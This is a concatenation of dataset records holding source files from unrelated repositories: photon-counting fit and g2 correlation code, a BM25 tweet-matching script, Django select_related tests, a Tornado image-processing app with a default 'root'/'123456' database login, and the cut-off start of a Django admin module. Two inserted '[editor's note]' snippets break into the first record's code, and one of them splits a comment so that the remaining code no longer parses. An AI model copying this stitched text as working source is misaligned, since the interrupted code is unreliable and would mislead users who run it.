Maximum likelihood routine to fit single exponential. 
Pro: Works also for small amount of data (single bins of 10ms!)\r\n # tlist: x-axis values, here time in ns; ylist: y-axis values, here cts per tlist-bin; istart and iend: first and last element of tlist and ylist that are considered for the fit.\r\n\r\n # check if istart and iend are good numbers\r\n if istart<0 or istart>=len(ylist):\r\n istart = 0\r\n print('WARNING: adapted istart in MaxLikelihoodExpFit')\r\n if iend<=istart or iend>len(ylist):\r\n iend = len(ylist)\r\n print('WARNING: adapted iend in MaxLikelihoodExpFit')\r\n\r\n # shift t0 to t=0\r\n ydata = ylist[istart:iend]\r\n xdata = tlist[istart:iend]\r\n\r\n # do calculations\r\n initParams = [np.max(ydata)*np.ones(expterms), 25*np.ones(expterms)] #initial guess for A and tau\r\n if expterms>1:\r\n initParams[1][0]=initParams[1][1]/10 #Make first component fast\r\n if expterms>2:\r\n initParams[1][2]=initParams[1][1]/5 #Make third component slow\r\n initParams = np.concatenate(initParams).ravel().tolist()\r\n results = minimize(MaxLikelihoodFunction_c, initParams, args=(xdata,ydata,bgcpb,expterms),method='Nelder-Mead') # minimize the negative of the maxlikelihood function instead of maximimizing\r\n Aest = results.x[0:expterms] # get results of fit, A\r\n tauest = results.x[expterms:2*expterms] # get results of fit, tau\r\n\r\n# if plotbool == True:\r\n# yest = np.array([Aest*np.exp(-(xdata[i]-xdata[0])/tauest)+bgcpb for i in range(len(xdata))])\r\n# plt.semilogy(tlist,ylist,'.',xdata,yest,[xdata[1],xdata[-1]],[bgcpb,bgcpb],'k--')\r\n# plt.show() \r\n\r\n\r\n if plotbool == True:\r\n # yest = np.array([Aest[k]*np.exp(-(xdata[i]-xdata[0])/tauest[k])+bgcpb for i in range(len(xdata))])\r\n yest = np.array([np.sum([Aest[k]*np.exp(-(xdata[i]-xdata[0])/tauest[k])+bgcpb*(k<1) for k in range(expterms)]) for i in range(len(xdata))])\r\n plt.figure()\r\n plt.plot(tlist,ylist,'.',xdata,yest,[xdata[1],xdata[-1]],[bgcpb,bgcpb],'k--')\r\n plt.xlim([xdata[1],xdata[-1]])\r\n plt.show() \r\n \r\n return(tauest,Aest)\r\n\r\n\r\n\r\n\r\n\r\n#I changed some things in the g2 which make it works smoothly compared to the g2 that you implemented.\r\ndef MakeG2(times0,times1,dtmicro,g2restime=64e-11*20,nrbins=200):\r\n i0=0\r\n i1=0\r\n lim1=0\r\n g2 = np.zeros(2*nrbins)\r\n #g2B = np.zeros(2*nrbins)\r\n #g2C = np.zeros(2*nrbins)\r\n #blindB = 2e-9\r\n #blindC = 5e-9\r\n\r\n g2res = g2restime/dtmicro #transform g2restime [s] to g2res [microtime units]\r\n #blindB = blindB/tmicro\r\n #blindC = blindC/tmicro\r\n g2tlist = np.arange(-g2res*dtmicro*(nrbins-0.5),g2res*dtmicro*nrbins,g2restime)*1e9 #I thought this was the change that made it work for me\r\n # correlate det0 with det1 (positive time differences)\r\n for i0 in tqdm(range(len(times0))):\r\n t0 = times0[i0]\r\n i1 = 0\r\n q = 0\r\n while q == 0: \r\n if lim1 + i1 < len(times1): # check if we've already reached end of photon stream on det1\r\n dt = times1[lim1+i1]-t0 \r\n if dt < 0: # find index lim1 of first photon on det1 that came after photon i0 on det0\r\n lim1 = lim1 + 1\r\n else:\r\n binnr = int(dt/g2res) # calculate binnr that corresponds to dt\r\n if binnr < nrbins: # check if time difference is already large enough to stop correlation\r\n g2[nrbins + binnr] += 1 # increase counter in corresponding bin by one\r\n #if microtimes0[i0] > blindB and microtimes1[lim1+i1] > blindB:poi\r\n #g2B[nrbins + binnr] += 1\r\n #if microtimes0[i0] > blindC and microtimes1[lim1+i1] > blindC:\r\n #g2C[nrbins + binnr] += 1\r\n i1 = i1 + 1 # look at next photon on det1\r\n else:\r\n q = 1 # dt larger than 
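# [editor's note] Self-contained sketch (synthetic decay) of the Poisson
# maximum-likelihood fit that MaxLikelihoodFunction above encodes: minimize
# -sum_i [ y_i * log(model_i) - model_i ] with Nelder-Mead, which behaves well
# even for sparse histograms.
import numpy as np
from scipy.optimize import minimize

rng = np.random.default_rng(4)
t = np.arange(0.0, 50.0, 0.5)                       # ns
y = rng.poisson(80.0 * np.exp(-t / 12.0) + 2.0)     # decay + flat background

def negloglik(params, t, y, bg):
    A, tau = params
    model = np.clip(A * np.exp(-t / tau) + bg, 1e-10, None)
    return -np.sum(y * np.log(model) - model)

res = minimize(negloglik, x0=[float(y.max()), 25.0], args=(t, y, 2.0),
               method='Nelder-Mead')
A_fit, tau_fit = res.x                              # tau_fit close to 12 ns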
maximum correlation width. stop. \r\n else:\r\n q = 1 # end of photon stream on det1 reached. stop.\r\n\r\n # correlate det1 with det0 (positive time differences)\r\n lim1=0\r\n for i0 in tqdm(range(len(times1))):\r\n t0 = times1[i0]\r\n i1 = 0\r\n q = 0\r\n while q == 0:\r\n if lim1 + i1 < len(times0):\r\n dt = times0[lim1+i1]-t0\r\n if dt < 0:\r\n lim1 = lim1 + 1\r\n else:\r\n binnr = int(dt/g2res)\r\n if binnr < nrbins:\r\n g2[nrbins - 1 - binnr] += 1\r\n #if microtimes0[lim1+i1] > blindB and microtimes1[i0] > blindB:\r\n # g2B[nrbins - 1 - binnr] += 1\r\n #if microtimes0[lim1+i1] > blindC and microtimes1[i0] > blindC:\r\n # g2C[nrbins - 1 - binnr] += 1\r\n i1 = i1 + 1\r\n else:\r\n q = 1\r\n else:\r\n q = 1\r\n \r\n # g2tlist = np.arange(g2res*dtmicro*nrbins,g2restime)*1e9\r\n plt.figure()\r\n plt.plot(g2tlist,g2)\r\n #plt.plot(g2tlist,g2B)\r\n #plt.plot(g2tlist,g2C)\r\n plt.title('g(2) correlation')\r\n plt.xlabel('delay (ns)')\r\n plt.ylabel('occurence (a.u.)')\r\n # plt.ylim([0,max(g2)])\r\n plt.show()\r\n\r\n return(g2tlist,g2,g2restime,nrbins)\r\n\r\ndef Easyhist(rawdata,lowestbin,highestbin,numberofpoints):\r\n plotpoints=numberofpoints+1\r\n edges=np.linspace(lowestbin,highestbin,plotpoints)\r\n wavelbins=np.linspace(lowestbin,highestbin,numberofpoints)\r\n histdata=np.histogram(rawdata,bins=edges)\r\n return wavelbins,histdata[0],edges","repo_name":"mmekkeringethcz/martijn_own_github","sub_path":"Read_PLE_functions_Martijn.py","file_name":"Read_PLE_functions_Martijn.py","file_ext":"py","file_size_in_byte":54091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35771467551","text":"# -*- coding: utf-8 -*-\r\nfrom gensim import corpora\r\nimport codecs\r\nimport math\r\nfrom text_to_bag_of_words import transform_line, words_have_stif_hashtag\r\nimport stif_nexterite_properties\r\nimport os\r\nfrom optparse import OptionParser\r\n\r\n\r\nlogger = stif_nexterite_properties.logger\r\n\r\nclass BM25 :\r\n def __init__(self, fn_docs, encoding='iso-8859-1' ) :\r\n self.encoding = encoding\r\n self.dictionary = corpora.Dictionary()\r\n self.DF = {}\r\n self.DocTF = []\r\n self.DocIDF = {}\r\n self.N = 0\r\n self.DocAvgLen = 0\r\n self.fn_docs = fn_docs\r\n self.DocLen = []\r\n self.buildDictionary()\r\n self.TFIDF_Generator()\r\n\r\n def buildDictionary(self) :\r\n raw_data = []\r\n with codecs.open(self.fn_docs,encoding=self.encoding) as f:\r\n for line in f :\r\n raw_data.append(transform_line(line))\r\n self.dictionary.add_documents(raw_data)\r\n\r\n def TFIDF_Generator(self, base=math.e) :\r\n docTotalLen = 0\r\n with codecs.open(self.fn_docs,encoding=self.encoding) as f:\r\n for line in f :\r\n doc = transform_line(line.strip())\r\n docTotalLen += len(doc)\r\n self.DocLen.append(len(doc))\r\n #print self.dictionary.doc2bow(doc)\r\n bow = dict([(term, freq*1.0/len(doc)) for term, freq in self.dictionary.doc2bow(doc)])\r\n for term, tf in bow.items() :\r\n if term not in self.DF :\r\n self.DF[term] = 0\r\n self.DF[term] += 1\r\n self.DocTF.append(bow)\r\n self.N = self.N + 1\r\n for term in self.DF:\r\n self.DocIDF[term] = math.log((self.N - self.DF[term] +0.5) / (self.DF[term] + 0.5), base)\r\n self.DocAvgLen = docTotalLen / self.N\r\n\r\n def BM25Score(self, Query=[], k1=1.5, b=0.75) :\r\n query_bow = self.dictionary.doc2bow(Query)\r\n scores = []\r\n for idx, doc in enumerate(self.DocTF) :\r\n commonTerms = set(dict(query_bow).keys()) & set(doc.keys())\r\n tmp_score = []\r\n doc_terms_len = self.DocLen[idx]\r\n for term 
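# [editor's note] The streaming two-pointer loop in MakeG2 above must reproduce
# this brute-force reference: histogram all pairwise arrival-time differences
# within a correlation window (hypothetical sparse photon streams, in seconds).
import numpy as np

t0 = np.sort(np.random.default_rng(5).uniform(0.0, 1e-3, 300))
t1 = np.sort(np.random.default_rng(6).uniform(0.0, 1e-3, 300))
window = 1e-6
dts = (t1[None, :] - t0[:, None]).ravel()
dts = dts[np.abs(dts) < window]
g2_ref, edges = np.histogram(dts, bins=400, range=(-window, window))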
in commonTerms :\r\n                upper = (doc[term] * (k1+1))\r\n                below = ((doc[term]) + k1*(1 - b + b*doc_terms_len/self.DocAvgLen))\r\n                tmp_score.append(self.DocIDF[term] * upper / below)\r\n            scores.append(sum(tmp_score))\r\n        return scores\r\n\r\n    def TFIDF(self) :\r\n        tfidf = []\r\n        for doc in self.DocTF :\r\n            doc_tfidf = [(term, tf*self.DocIDF[term]) for term, tf in doc.items()]\r\n            doc_tfidf.sort()\r\n            tfidf.append(doc_tfidf)\r\n        return tfidf\r\n\r\n    def Text_line(self,i):\r\n        return open(self.fn_docs, \"r\").readlines()[i]\r\n\r\n    def Items(self) :\r\n        # Return a list [(term_idx, term_desc),]\r\n        items = self.dictionary.items()\r\n        #items.sort()\r\n        return items\r\n\r\ndef do_write_bm25_similarity_files(idate,filename1, filename2):\r\n    data_dir = stif_nexterite_properties.data_dir\r\n    bm25 = BM25(filename1)\r\n    with codecs.open(filename2, 'r',encoding='utf-8', errors='ignore') as f:\r\n        lines = f.readlines()\r\n    iname = \"bm25_alerts_\"+idate\r\n    ftt = codecs.open(os.path.join(data_dir,stif_nexterite_properties.label_name, iname+\".out\"), 'wb','utf-8')\r\n    fnt = codecs.open(os.path.join(data_dir,stif_nexterite_properties.not_label_name, \"no_\"+iname+\".out\"), 'wb','utf-8')\r\n    il=0\r\n    inl=0\r\n    for line in lines:\r\n        words = transform_line(line)\r\n        scores = bm25.BM25Score(words)\r\n        best_score = max(scores)\r\n        if best_score > stif_nexterite_properties.bm25_seuil:\r\n            ftt.write(line)\r\n            il += 1\r\n            #ftt.write(\"****Best match %f\\t%s\"%(best_score,bm25.Text_line(i_line)))\r\n        else:\r\n            if not words_have_stif_hashtag(words):\r\n                fnt.write(line)\r\n                inl += 1\r\n                #fnt.write(\"****Best match %f\\t%s\"%(best_score,bm25.Text_line(i_line)))\r\n    ftt.close()\r\n    fnt.close()\r\n    logger.info(\"%s %d\"%(iname,il))\r\n    logger.info(\"%s %d\"%(\"no_\"+iname,inl))\r\n\r\ndef write_bm25_similarity_files(idate,data_dir=stif_nexterite_properties.data_dir,data_impact_dir=stif_nexterite_properties.data_impact_dir,label_dir=stif_nexterite_properties.label_name,pre_dir=stif_nexterite_properties.pre_name):\r\n    impact_filename = os.path.join(data_impact_dir, 'IMPACT_'+idate.replace('.','-')+'.csv')\r\n    infilename = os.path.join(data_dir, label_dir,pre_dir,'alerts_'+idate+'.out')\r\n    do_write_bm25_similarity_files(idate,impact_filename,infilename)\r\n\r\n\r\nif __name__ == '__main__' :\r\n    op = OptionParser()\r\n    op.add_option(\"-d\", \"--date\",\r\n                  action=\"store\", dest=\"sel_date\", default=None,\r\n                  help=\"Selection date\")\r\n    op.add_option(\"--src\",\r\n                  action=\"store\", dest=\"source\", default=None,\r\n                  help=\"Source path, relative to data_dir\")\r\n    op.add_option(\"--target\",\r\n                  action=\"store\", dest=\"target\", default=None,\r\n                  help=\"Target path, relative to data_dir\")\r\n    (opts, args) = op.parse_args()\r\n    if opts.sel_date is not None:\r\n        if opts.source is None:\r\n            write_bm25_similarity_files(opts.sel_date)\r\n        elif opts.target is not None:\r\n            do_write_bm25_similarity_files(opts.sel_date,os.path.join(stif_nexterite_properties.data_dir,opts.source),os.path.join(stif_nexterite_properties.data_dir,opts.target))\r\n\r\n\r\n","repo_name":"filrougestif2016/STIF_FILROUGE2016","sub_path":"PYTHON/CLASSIFICATION/bm25_impact_tweet.py","file_name":"bm25_impact_tweet.py","file_ext":"py","file_size_in_byte":5672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"6307437655","text":"from django.core.exceptions import FieldError\nfrom django.db.models import FilteredRelation\nfrom django.test import SimpleTestCase, TestCase\n\nfrom .models import (\n    
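# These models form the one-to-one and inheritance chains that select_related() traverses in the tests below.\n    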
AdvancedUserStat,\n Child1,\n Child2,\n Child3,\n Child4,\n Image,\n LinkedList,\n Parent1,\n Parent2,\n Product,\n StatDetails,\n User,\n UserProfile,\n UserStat,\n UserStatResult,\n)\n\n\nclass ReverseSelectRelatedTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n user = User.objects.create(username=\"test\")\n UserProfile.objects.create(user=user, state=\"KS\", city=\"Lawrence\")\n results = UserStatResult.objects.create(results=\"first results\")\n userstat = UserStat.objects.create(user=user, posts=150, results=results)\n StatDetails.objects.create(base_stats=userstat, comments=259)\n\n user2 = User.objects.create(username=\"bob\")\n results2 = UserStatResult.objects.create(results=\"moar results\")\n advstat = AdvancedUserStat.objects.create(\n user=user2, posts=200, karma=5, results=results2\n )\n StatDetails.objects.create(base_stats=advstat, comments=250)\n p1 = Parent1(name1=\"Only Parent1\")\n p1.save()\n c1 = Child1(name1=\"Child1 Parent1\", name2=\"Child1 Parent2\", value=1)\n c1.save()\n p2 = Parent2(name2=\"Child2 Parent2\")\n p2.save()\n c2 = Child2(name1=\"Child2 Parent1\", parent2=p2, value=2)\n c2.save()\n\n def test_basic(self):\n with self.assertNumQueries(1):\n u = User.objects.select_related(\"userprofile\").get(username=\"test\")\n self.assertEqual(u.userprofile.state, \"KS\")\n\n def test_follow_next_level(self):\n with self.assertNumQueries(1):\n u = User.objects.select_related(\"userstat__results\").get(username=\"test\")\n self.assertEqual(u.userstat.posts, 150)\n self.assertEqual(u.userstat.results.results, \"first results\")\n\n def test_follow_two(self):\n with self.assertNumQueries(1):\n u = User.objects.select_related(\"userprofile\", \"userstat\").get(\n username=\"test\"\n )\n self.assertEqual(u.userprofile.state, \"KS\")\n self.assertEqual(u.userstat.posts, 150)\n\n def test_follow_two_next_level(self):\n with self.assertNumQueries(1):\n u = User.objects.select_related(\n \"userstat__results\", \"userstat__statdetails\"\n ).get(username=\"test\")\n self.assertEqual(u.userstat.results.results, \"first results\")\n self.assertEqual(u.userstat.statdetails.comments, 259)\n\n def test_forward_and_back(self):\n with self.assertNumQueries(1):\n stat = UserStat.objects.select_related(\"user__userprofile\").get(\n user__username=\"test\"\n )\n self.assertEqual(stat.user.userprofile.state, \"KS\")\n self.assertEqual(stat.user.userstat.posts, 150)\n\n def test_back_and_forward(self):\n with self.assertNumQueries(1):\n u = User.objects.select_related(\"userstat\").get(username=\"test\")\n self.assertEqual(u.userstat.user.username, \"test\")\n\n def test_not_followed_by_default(self):\n with self.assertNumQueries(2):\n u = User.objects.select_related().get(username=\"test\")\n self.assertEqual(u.userstat.posts, 150)\n\n def test_follow_from_child_class(self):\n with self.assertNumQueries(1):\n stat = AdvancedUserStat.objects.select_related(\"user\", \"statdetails\").get(\n posts=200\n )\n self.assertEqual(stat.statdetails.comments, 250)\n self.assertEqual(stat.user.username, \"bob\")\n\n def test_follow_inheritance(self):\n with self.assertNumQueries(1):\n stat = UserStat.objects.select_related(\"user\", \"advanceduserstat\").get(\n posts=200\n )\n self.assertEqual(stat.advanceduserstat.posts, 200)\n self.assertEqual(stat.user.username, \"bob\")\n with self.assertNumQueries(0):\n self.assertEqual(stat.advanceduserstat.user.username, \"bob\")\n\n def test_nullable_relation(self):\n im = Image.objects.create(name=\"imag1\")\n p1 = 
Product.objects.create(name=\"Django Plushie\", image=im)\n p2 = Product.objects.create(name=\"Talking Django Plushie\")\n\n with self.assertNumQueries(1):\n result = sorted(\n Product.objects.select_related(\"image\"), key=lambda x: x.name\n )\n self.assertEqual(\n [p.name for p in result], [\"Django Plushie\", \"Talking Django Plushie\"]\n )\n\n self.assertEqual(p1.image, im)\n # Check for ticket #13839\n self.assertIsNone(p2.image)\n\n def test_missing_reverse(self):\n \"\"\"\n Ticket #13839: select_related() should NOT cache None\n for missing objects on a reverse 1-1 relation.\n \"\"\"\n with self.assertNumQueries(1):\n user = User.objects.select_related(\"userprofile\").get(username=\"bob\")\n with self.assertRaises(UserProfile.DoesNotExist):\n user.userprofile\n\n def test_nullable_missing_reverse(self):\n \"\"\"\n Ticket #13839: select_related() should NOT cache None\n for missing objects on a reverse 0-1 relation.\n \"\"\"\n Image.objects.create(name=\"imag1\")\n\n with self.assertNumQueries(1):\n image = Image.objects.select_related(\"product\").get()\n with self.assertRaises(Product.DoesNotExist):\n image.product\n\n def test_parent_only(self):\n with self.assertNumQueries(1):\n p = Parent1.objects.select_related(\"child1\").get(name1=\"Only Parent1\")\n with self.assertNumQueries(0):\n with self.assertRaises(Child1.DoesNotExist):\n p.child1\n\n def test_multiple_subclass(self):\n with self.assertNumQueries(1):\n p = Parent1.objects.select_related(\"child1\").get(name1=\"Child1 Parent1\")\n self.assertEqual(p.child1.name2, \"Child1 Parent2\")\n\n def test_onetoone_with_subclass(self):\n with self.assertNumQueries(1):\n p = Parent2.objects.select_related(\"child2\").get(name2=\"Child2 Parent2\")\n self.assertEqual(p.child2.name1, \"Child2 Parent1\")\n\n def test_onetoone_with_two_subclasses(self):\n with self.assertNumQueries(1):\n p = Parent2.objects.select_related(\"child2\", \"child2__child3\").get(\n name2=\"Child2 Parent2\"\n )\n self.assertEqual(p.child2.name1, \"Child2 Parent1\")\n with self.assertRaises(Child3.DoesNotExist):\n p.child2.child3\n p3 = Parent2(name2=\"Child3 Parent2\")\n p3.save()\n c2 = Child3(name1=\"Child3 Parent1\", parent2=p3, value=2, value3=3)\n c2.save()\n with self.assertNumQueries(1):\n p = Parent2.objects.select_related(\"child2\", \"child2__child3\").get(\n name2=\"Child3 Parent2\"\n )\n self.assertEqual(p.child2.name1, \"Child3 Parent1\")\n self.assertEqual(p.child2.child3.value3, 3)\n self.assertEqual(p.child2.child3.value, p.child2.value)\n self.assertEqual(p.child2.name1, p.child2.child3.name1)\n\n def test_multiinheritance_two_subclasses(self):\n with self.assertNumQueries(1):\n p = Parent1.objects.select_related(\"child1\", \"child1__child4\").get(\n name1=\"Child1 Parent1\"\n )\n self.assertEqual(p.child1.name2, \"Child1 Parent2\")\n self.assertEqual(p.child1.name1, p.name1)\n with self.assertRaises(Child4.DoesNotExist):\n p.child1.child4\n Child4(name1=\"n1\", name2=\"n2\", value=1, value4=4).save()\n with self.assertNumQueries(1):\n p = Parent2.objects.select_related(\"child1\", \"child1__child4\").get(\n name2=\"n2\"\n )\n self.assertEqual(p.name2, \"n2\")\n self.assertEqual(p.child1.name1, \"n1\")\n self.assertEqual(p.child1.name2, p.name2)\n self.assertEqual(p.child1.value, 1)\n self.assertEqual(p.child1.child4.name1, p.child1.name1)\n self.assertEqual(p.child1.child4.name2, p.child1.name2)\n self.assertEqual(p.child1.child4.value, p.child1.value)\n self.assertEqual(p.child1.child4.value4, 4)\n\n def test_inheritance_deferred(self):\n 
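# only() restricts the immediately loaded fields, so touching a deferred field afterwards costs one extra query, as the assertNumQueries checks below verify.\n        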
c = Child4.objects.create(name1=\"n1\", name2=\"n2\", value=1, value4=4)\n        with self.assertNumQueries(1):\n            p = (\n                Parent2.objects.select_related(\"child1\")\n                .only(\"id2\", \"child1__value\")\n                .get(name2=\"n2\")\n            )\n            self.assertEqual(p.id2, c.id2)\n            self.assertEqual(p.child1.value, 1)\n        p = (\n            Parent2.objects.select_related(\"child1\")\n            .only(\"id2\", \"child1__value\")\n            .get(name2=\"n2\")\n        )\n        with self.assertNumQueries(1):\n            self.assertEqual(p.name2, \"n2\")\n        p = (\n            Parent2.objects.select_related(\"child1\")\n            .only(\"id2\", \"child1__value\")\n            .get(name2=\"n2\")\n        )\n        with self.assertNumQueries(1):\n            self.assertEqual(p.child1.name2, \"n2\")\n\n    def test_inheritance_deferred2(self):\n        c = Child4.objects.create(name1=\"n1\", name2=\"n2\", value=1, value4=4)\n        qs = Parent2.objects.select_related(\"child1\", \"child1__child4\").only(\n            \"id2\", \"child1__value\", \"child1__child4__value4\"\n        )\n        with self.assertNumQueries(1):\n            p = qs.get(name2=\"n2\")\n            self.assertEqual(p.id2, c.id2)\n            self.assertEqual(p.child1.value, 1)\n            self.assertEqual(p.child1.child4.value4, 4)\n            self.assertEqual(p.child1.child4.id2, c.id2)\n        p = qs.get(name2=\"n2\")\n        with self.assertNumQueries(1):\n            self.assertEqual(p.child1.name2, \"n2\")\n        p = qs.get(name2=\"n2\")\n        with self.assertNumQueries(0):\n            self.assertEqual(p.child1.value, 1)\n            self.assertEqual(p.child1.child4.value4, 4)\n        with self.assertNumQueries(2):\n            self.assertEqual(p.child1.name1, \"n1\")\n            self.assertEqual(p.child1.child4.name1, \"n1\")\n\n    def test_self_relation(self):\n        item1 = LinkedList.objects.create(name=\"item1\")\n        LinkedList.objects.create(name=\"item2\", previous_item=item1)\n        with self.assertNumQueries(1):\n            item1_db = LinkedList.objects.select_related(\"next_item\").get(name=\"item1\")\n            self.assertEqual(item1_db.next_item.name, \"item2\")\n\n\nclass ReverseSelectRelatedValidationTests(SimpleTestCase):\n    \"\"\"\n    Reverse related fields should be listed in the validation message when an\n    invalid field is given in select_related().\n    \"\"\"\n\n    non_relational_error = (\n        \"Non-relational field given in select_related: '%s'. Choices are: %s\"\n    )\n    invalid_error = (\n        \"Invalid field name(s) given in select_related: '%s'. 
Choices are: %s\"\n    )\n\n    def test_reverse_related_validation(self):\n        fields = \"userprofile, userstat\"\n\n        with self.assertRaisesMessage(\n            FieldError, self.invalid_error % (\"foobar\", fields)\n        ):\n            list(User.objects.select_related(\"foobar\"))\n\n        with self.assertRaisesMessage(\n            FieldError, self.non_relational_error % (\"username\", fields)\n        ):\n            list(User.objects.select_related(\"username\"))\n\n    def test_reverse_related_validation_with_filtered_relation(self):\n        fields = \"userprofile, userstat, relation\"\n        with self.assertRaisesMessage(\n            FieldError, self.invalid_error % (\"foobar\", fields)\n        ):\n            list(\n                User.objects.annotate(\n                    relation=FilteredRelation(\"userprofile\")\n                ).select_related(\"foobar\")\n            )\n","repo_name":"django/django","sub_path":"tests/select_related_onetoone/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11873,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"}
{"seq_id":"40676800853","text":"import sys\nimport os.path\nimport re\nimport torndb\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nfrom tornado.options import define, options\nfrom handler.login import *\nfrom handler.main import *\nfrom handler.image import *\nfrom handler.color import *\nfrom handler.Morphological import *\nfrom handler.canny import *\nfrom handler.pyramid import *\nfrom handler.hash import *\nfrom handler.noisy import *\nfrom handler.equ import *\nfrom handler.hist import *\nfrom handler.hough import *\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\ndefine(\"mysql_host\", default=\"127.0.0.1:3306\", help=\"blog database host\")\ndefine(\"mysql_database\", default=\"franzblog\", help=\"blog database name\")\ndefine(\"mysql_user\", default=\"root\", help=\"blog database user\")\ndefine(\"mysql_password\", default=\"123456\", help=\"blog database password\")\n\n\n\nclass Application(tornado.web.Application):\n    def __init__(self):\n        handlers = [\n            # Home page\n            (r\"/\", MainHandler),\n            # Control and test panel\n            (r\"/dashboard\", DashBoardHandler),\n            # Login and registration\n            (r\"/error\",ErrorHandler),\n            (r\"/login\",LoginHandler),\n            (r\"/loginout\",LogoutHandler),\n            (r\"/needlogin\",NeedLoginHandler),\n            (r\"/register\",RegisterHandler),\n            (r\"/success\",SuccessHandler),\n            #image\n            # Convert color images to black and white\n            (r\"/addimage\",AddImageHandler),\n            (r\"/imagenow\",NowImageHandler),\n            (r\"/imagetmp\",TmpImageHandler),\n            (r\"/imageupload\",UploadImageHandler),\n            (r\"/imageprocess\",ProcessImageHandler),\n            (r\"/imagereset\", ResetImageHandler),\n            (r\"/imagedownload\",DownloadTmpImageHandler),\n            (r\"/ColorBlackWhite\", ColorBlackWhiteHandler),\n            # Image processing: color extraction\n            (r\"/customcolor\", CustomColorHandler),\n            (r\"/getorangered\",GetOrangeRedHandler),\n            (r\"/getorange\",GetOrangeHandler),\n            (r\"/getyellow\",GetYellowHandler),\n            (r\"/getyellowgreen\",GetYelloGreenwHandler),\n            (r\"/getweakgreen\",GetWeakGreenwHandler),\n            (r\"/getweakgreentwo\",GetWeakGreenTwoHandler),\n            (r\"/getweakgreenthree\",GetWeakGreenThreeHandler),\n            (r\"/getgreen\",GetGreenHandler),\n            (r\"/getbluegreen\",GetBlueGreenHandler),\n            (r\"/getweakblue\",GetWeakBlueHandler),\n            (r\"/getblue\",GetBlueHandler),\n            (r\"/getdeepblue\",GetDeepBlueHandler),\n            (r\"/getdeepbluetwo\",GetDeepBlueTwoHandler),\n            (r\"/getpurple\", GetPurpleHandler),\n            (r\"/getpurpletwo\", GetPurpleTwoHandler),\n            (r\"/getpurplethree\", GetPurpleThreeHandler),\n            (r\"/getpink\", GetPinkHandler),\n            (r\"/getred\", GetRedHandler),\n            # Morphological transformations\n            (r\"/rust\", RustImageHandler),\n            
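# '/rust' appears to map to erosion (likely a literal translation slip for 'erode'); dilation, opening and closing follow.\n            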
(r\"/dilation\", DilationImageHandler),\n (r\"/opening\", OpeningHandler),\n (r\"/closing\", ClosingHandler),\n (r\"/gradient\", GradientHandler),\n (r\"/tophat\", TopHatHandler),\n (r\"/blackhat\", BlackHatHandler),\n #边缘检测\n (r\"/laplacian\", LaplacianHandler),\n (r\"/sobelx\", SobelxHandler),\n (r\"/sobely\", SobelyHandler), \n (r\"/canny\", CannyHandler),\n #金字塔\n (r\"/pyrdown\", PyrDownHandler),\n (r\"/pyrup\", PyrUpHandler),\n #哈希\n (r\"/phash\", PhashHandler),\n #去噪\n (r\"/RepairNoColored\", RepairNoColoredHandler),\n (r\"/RepairColored\", RepairColoredHandler),\n #图像均值化增加对比度\n (r\"/Equ\", EquHandler),\n #颜色直方图\n (r\"/bhist\", BlueHistHandler),\n (r\"/ghist\", GreenHistHandler),\n (r\"/rhist\", RedHistHandler),\n (r\"/bgrhist\", BGRHistHandler),\n #Houghline\n (r\"/hlines\", HoughlinesHandler),\n (r\"/hlinesP\",HoughlinesPHandler),\n (r\"/hcircles\",HoughCirclesHandler),\n \n \n \n\n \n \n \n \n\n ]\n\n settings = dict(\n blog_title=u\"Tornado Blog\",\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookies=False,\n cookie_secret=\"__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__\",\n debug=True,\n )\n\n tornado.web.Application.__init__(self, handlers, **settings)\n self.db = torndb.Connection(\n host=options.mysql_host, database=options.mysql_database,\n user=options.mysql_user, password=options.mysql_password,charset='utf8')\n\n\ndef main():\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(Application())\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n\nif __name__ == \"__main__\":\n main()","repo_name":"rinetd/ImageOnline","sub_path":"A/ImageOneline.py","file_name":"ImageOneline.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"27993806091","text":"import json\nfrom collections import OrderedDict\nfrom functools import wraps\n\nfrom django.conf import settings\nfrom django.contrib.admin.models import LogEntry, CHANGE\nfrom django.contrib.admin.options import get_content_type_for_model\nfrom django.contrib.auth import get_permission_codename\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.postgres.fields import JSONField\nfrom django.db import models\nfrom django.db.models.base import ModelBase\nfrom django.db.models.fields import NOT_PROVIDED\nfrom django.forms import model_to_dict\nfrom django.utils.encoding import force_str\nfrom django.utils.functional import cached_property\nfrom django.utils.html import escape\nfrom django.utils.safestring import SafeString, mark_safe\nfrom rest_framework import filters\nfrom rest_framework import serializers\nfrom rest_framework import viewsets, status\nfrom rest_framework.decorators import action as base_action\nfrom rest_framework.fields import ImageField\nfrom rest_framework.fields import SkipField\nfrom rest_framework.metadata import SimpleMetadata\nfrom rest_framework.permissions import AllowAny, BasePermission\nfrom rest_framework.relations import PrimaryKeyRelatedField, PKOnlyObject, ManyRelatedField\nfrom rest_framework.response import Response\nfrom rest_framework.routers import DefaultRouter\nfrom rest_framework.serializers import ModelSerializer\nfrom rest_framework.serializers import SerializerMethodField\n\nfrom admin_rest.fields import CurrencySerialRestField\nfrom admin_rest.fields import ForeignSerialField\nfrom admin_rest.filters import 
